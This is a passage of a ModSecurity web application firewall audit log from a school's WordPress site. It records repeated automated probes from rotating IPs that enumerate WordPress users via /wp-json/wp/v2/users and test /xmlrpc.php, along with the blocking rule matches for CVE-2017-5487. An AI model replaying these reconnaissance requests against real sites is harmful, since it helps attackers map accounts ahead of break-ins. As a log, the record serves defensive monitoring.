156.233.84.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b3a3f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3a3f3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676270563102 2883 (- - -) Stopwatch2: 1746676270563102 2883; combined=1336, p1=458, p2=847, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3a3f3f-Z-- --3d28c122-A-- [08/May/2025:10:51:16 +0700] aBwqNKcs1DvJ_HgMHE_x9AAAAAU 103.236.140.4 43612 103.236.140.4 8181 --3d28c122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d28c122-C-- demo.sayHello --3d28c122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d28c122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676276939789 4709 (- - -) Stopwatch2: 1746676276939789 4709; combined=3412, p1=450, p2=2778, p3=24, p4=27, p5=78, sr=61, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d28c122-Z-- --2bb27c68-A-- [08/May/2025:10:53:05 +0700] aBwqoacs1DvJ_HgMHE_x9wAAAAM 103.236.140.4 43630 103.236.140.4 8181 --2bb27c68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.215.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.215.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bb27c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bb27c68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676385495085 3022 (- - -) Stopwatch2: 1746676385495085 3022; combined=1278, p1=470, p2=783, p3=0, p4=0, p5=25, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb27c68-Z-- --f2502a67-A-- [08/May/2025:10:59:09 +0700] aBwsDacs1DvJ_HgMHE_x_AAAAA8 103.236.140.4 43652 103.236.140.4 8181 --f2502a67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2502a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2502a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676749233867 2784 (- - -) Stopwatch2: 1746676749233867 2784; combined=1243, p1=436, p2=775, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2502a67-Z-- --fc635b06-A-- [08/May/2025:10:59:15 +0700] aBwsE6cs1DvJ_HgMHE_x_gAAABI 103.236.140.4 43656 103.236.140.4 8181 --fc635b06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc635b06-C-- demo.sayHello --fc635b06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc635b06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676755727223 5481 (- - -) Stopwatch2: 1746676755727223 5481; combined=4040, p1=510, p2=3267, p3=29, p4=31, p5=130, sr=74, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc635b06-Z-- --e3292645-A-- [08/May/2025:10:59:17 +0700] aBwsFacs1DvJ_HgMHE_x_wAAABE 103.236.140.4 43658 103.236.140.4 8181 --e3292645-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3292645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3292645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676757504047 1427 (- - -) Stopwatch2: 1746676757504047 1427; combined=662, p1=245, p2=399, p3=0, p4=0, p5=18, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3292645-Z-- --3b53eb38-A-- [08/May/2025:10:59:22 +0700] aBwsGqcs1DvJ_HgMHE_yAgAAABg 103.236.140.4 43664 103.236.140.4 8181 --3b53eb38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b53eb38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b53eb38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676762466309 2363 (- - -) Stopwatch2: 1746676762466309 2363; combined=1027, p1=330, p2=664, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b53eb38-Z-- --75f5c145-A-- [08/May/2025:10:59:23 +0700] aBwsG6cs1DvJ_HgMHE_yAwAAAAE 103.236.140.4 43666 103.236.140.4 8181 --75f5c145-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --75f5c145-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75f5c145-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676763108097 2399 (- - -) Stopwatch2: 1746676763108097 2399; combined=1111, p1=392, p2=690, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75f5c145-Z-- --f99f8730-A-- [08/May/2025:10:59:23 +0700] aBwsG6cs1DvJ_HgMHE_yBAAAAAc 103.236.140.4 43668 103.236.140.4 8181 --f99f8730-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.131 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f99f8730-C-- demo.sayHello --f99f8730-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99f8730-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676763920688 6134 (- - -) Stopwatch2: 1746676763920688 6134; combined=4375, p1=597, p2=3535, p3=36, p4=34, p5=101, sr=79, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99f8730-Z-- --55ed1235-A-- [08/May/2025:10:59:27 +0700] aBwsH6cs1DvJ_HgMHE_yCAAAAAw 103.236.140.4 43676 103.236.140.4 8181 --55ed1235-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55ed1235-C-- demo.sayHello --55ed1235-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55ed1235-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676767028300 4338 (- - -) Stopwatch2: 1746676767028300 4338; combined=3394, p1=406, p2=2795, p3=23, p4=23, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55ed1235-Z-- --8aed226d-A-- [08/May/2025:10:59:27 +0700] aBwsH6cs1DvJ_HgMHE_yCQAAAA0 103.236.140.4 43678 103.236.140.4 8181 --8aed226d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.126 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8aed226d-C-- demo.sayHello --8aed226d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8aed226d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676767592881 13891 (- - -) Stopwatch2: 1746676767592881 13891; combined=21030, p1=478, p2=3358, p3=26, p4=31, p5=8582, sr=75, sw=66, l=0, gc=8489 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aed226d-Z-- --bb27dc0c-A-- [08/May/2025:11:00:05 +0700] aBwsRacs1DvJ_HgMHE_yDwAAABI 103.236.140.4 43696 103.236.140.4 8181 --bb27dc0c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bb27dc0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb27dc0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676805327183 3296 (- - -) Stopwatch2: 1746676805327183 3296; combined=1427, p1=483, p2=911, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb27dc0c-Z-- --8536e528-A-- [08/May/2025:11:00:08 +0700] aBwsSKcs1DvJ_HgMHE_yEQAAABc 103.236.140.4 43700 103.236.140.4 8181 --8536e528-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8536e528-C-- demo.sayHello --8536e528-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8536e528-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676808707524 6767 (- - -) Stopwatch2: 1746676808707524 6767; combined=4861, p1=672, p2=3949, p3=37, p4=42, p5=96, sr=83, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8536e528-Z-- --fc123f73-A-- [08/May/2025:11:00:17 +0700] aBwsUacs1DvJ_HgMHE_yEwAAABg 103.236.140.4 43706 103.236.140.4 8181 --fc123f73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fc123f73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc123f73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676817073506 3051 (- - -) Stopwatch2: 1746676817073506 3051; combined=1330, p1=425, p2=875, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc123f73-Z-- --e03c6538-A-- [08/May/2025:11:00:20 +0700] aBwsVKcs1DvJ_HgMHE_yFQAAAAU 103.236.140.4 43710 103.236.140.4 8181 --e03c6538-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.106.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.106.115 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e03c6538-C-- demo.sayHello --e03c6538-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e03c6538-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676820900905 4914 (- - -) Stopwatch2: 1746676820900905 4914; combined=3781, p1=453, p2=3121, p3=25, p4=24, p5=92, sr=66, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e03c6538-Z-- --52a33904-A-- [08/May/2025:11:00:24 +0700] aBwsWI4K347NtBcwXKwGVQAAAIs 103.236.140.4 43724 103.236.140.4 8181 --52a33904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --52a33904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a33904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676824376081 3267 (- - -) Stopwatch2: 1746676824376081 3267; combined=1463, p1=498, p2=933, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a33904-Z-- --13377336-A-- [08/May/2025:11:00:27 +0700] aBwsWys5rYyn3jlLjjK_bwAAAMs 103.236.140.4 43728 103.236.140.4 8181 --13377336-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13377336-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13377336-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676827037792 2588 (- - -) Stopwatch2: 1746676827037792 2588; combined=1221, p1=418, p2=774, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13377336-Z-- --c5861f0b-A-- [08/May/2025:11:00:28 +0700] aBwsXKcs1DvJ_HgMHE_yGAAAAAM 